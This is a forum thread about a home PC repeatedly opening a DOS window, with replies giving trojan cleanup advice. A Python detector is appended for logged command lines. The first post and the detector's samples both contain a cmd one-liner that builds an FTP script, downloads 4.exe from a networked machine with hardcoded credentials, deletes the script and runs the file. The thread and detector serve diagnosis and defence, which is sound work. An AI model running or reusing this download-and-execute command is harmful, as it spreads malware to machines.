
Help - Suspicious Behaviour (Spyware/Trojan?)

KevH
Grafter
Posts: 59
Registered: 30-07-2007

Help - Suspicious Behaviour (Spyware/Trojan?)

Hi

I need some help from some people more knowledgeable than me.

For the last 2-3 weeks I've had an occasional DOS window open with something trying to run an ftp command. The first time I was at work and the wife rang to say something was up. We quickly shut down the PC and I've run several programs (Adaware, Spybot S+D and the Trend online adaware killers), including the Zone Alarm package that I run, and apart from the usual tracking cookies nothing was found.

This morning another DOS window opened which had the command:

cmd /c echo open 192.168.1.100 31531 >> ik &echo user mik3 j0nes >> ik &echo get 4.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &4.exe &exit

Note: 192.168.1.100 is another PC on the network at home - all of which I checked out and were clean.

This time ZA asked me for permission to run. Again another system scan didn't find anything.

Any ideas what might be causing this?

Thanks

Kev
4 REPLIES
Community Veteran
Posts: 4,729
Registered: 04-04-2007

Help - Suspicious Behaviour (Spyware/Trojan?)

Googling "4.exe" gives:
http://www.liutilities.com/products/wintaskspro/processlibrary/ssk3_b5%20seedcorn%204/

Quote
Description:
ssk3_b5 seedcorn 4.exe is a process belonging to an advertising program by Blue Tide Software. This process monitors your browsing habits and distributes the data back to the author's servers for analysis. This also prompts advertising popups. This process is a security risk and should be removed from your system.

Recommendation for ssk3_b5 seedcorn 4.exe:
DISABLE AND REMOVE ssk3_b5 seedcorn 4.exe IMMEDIATELY. This process is most likely an adware or spyware. It is highly recommended to Run a Free Performance Scan to automatically optimize memory, CPU and Internet settings.
Community Veteran
Posts: 1,229
Thanks: 1
Registered: 30-07-2007

Help - Suspicious Behaviour (Spyware/Trojan?)

Hmmm, I googled bits of that script and it does seem like a crude virus/trojan which is trying to infect other machines.
Probably worth starting in safe mode with networking and running a few of the other online virus checkers like Panda ActiveScan and Bitdefender.
Also have a look at http://forums.majorgeeks.com/showthread.php?t=35407
KevH
Grafter
Posts: 59
Registered: 30-07-2007

Help - Suspicious Behaviour (Spyware/Trojan?)

Thanks!

Wonder why the ZA, Trend Micro, adaware and spybot S+D searches didn't spot it?
N/A

Help - Suspicious Behaviour (Spyware/Trojan?)

First go to windows system32 and rename ftp.exe to ftpold.exe; this will stop the prog doing any damage as it won't be able to get access to ftp. You can rename it back when you solve the problem.

Next download startup cpl from
http://www.mlin.net/StartupCPL.shtml

and see what's running at startup. Look for anything without an icon or showing a DOS box icon. With this StartupCPL you can just untick things to stop them running and tick them if you need to put them back. Also look for get 4.exe. Do a file find for get 4.exe and see if you can find it. You could also do a file find for *.cmd or *.bat and see what it finds; if you find any you can look at them with Notepad. You could do a file find for a file containing the text ik &ftp -n -v -s:ik &del ik &4.exe &exit and see if that finds it.

Check scheduled tasks in the control panel to see if there is anything there.

I would suspect that it's a script of some sort like a cmd, bat or vb script and that is why it's not being picked up.

Check in task manager to see what's running and if you aren't sure check with

http://www.processlibrary.com/

to see what the processes do.
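
Added example, not part of any post in this thread: a Python check that flags the command-line shape quoted in the first post (an FTP script assembled with echo redirection, run with ftp -s:, then deleted, with the fetched file executed), meant for running over logged process command lines. The function names and the two benign sample lines are constructed for illustration.

```python
import re

# Building blocks of the one-liner quoted in the first post.
ECHO_TO_FILE = re.compile(r'echo\s+[^&|]*?>>?\s*("?)([^\s&|"]+)\1', re.I)
FTP_SCRIPT = re.compile(r'\bftp(?:\.exe)?\b[^&|]*?-s:("?)([^\s&|"]+)\1', re.I)
FTP_GET = re.compile(r'echo\s+m?get\s+([^\s&|>]+)', re.I)

def analyse(cmdline):
    """Return findings for one command line, or None if the pattern is absent."""
    ftp = FTP_SCRIPT.search(cmdline)
    if not ftp:
        return None
    script = ftp.group(2).lower()
    echoed = {m.group(2).lower() for m in ECHO_TO_FILE.finditer(cmdline)}
    if script not in echoed:
        return None  # ftp -s: reads a script this command line did not build
    fetched = [m.group(1).lower() for m in FTP_GET.finditer(cmdline)]
    # cmd.exe chains commands with '&'; look at each one on its own.
    parts = [p.strip().lower() for p in cmdline.split('&') if p.strip()]
    return {
        "script": script,
        "fetched": fetched,
        "executed": [f for f in fetched if f in parts],
        "script_deleted": any(p.split() == ["del", script] for p in parts),
    }

def scan(lines):
    """Return (line_number, findings) for every line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = analyse(line)
        if found:
            hits.append((number, found))
    return hits

SAMPLE = [
    # Constructed benign lines, then the command quoted in the first post.
    r'ftp -s:backup.txt ftp.example.com',
    r'cmd /c echo done >> build.log & dir',
    r'cmd /c echo open 192.168.1.100 31531 >> ik &echo user mik3 j0nes >> ik '
    r'&echo get 4.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &4.exe &exit',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE):
        print(number, found)
```

A plain `ftp -s:` call with a pre-existing script file is not flagged; only a command line that both writes the script and runs it is reported.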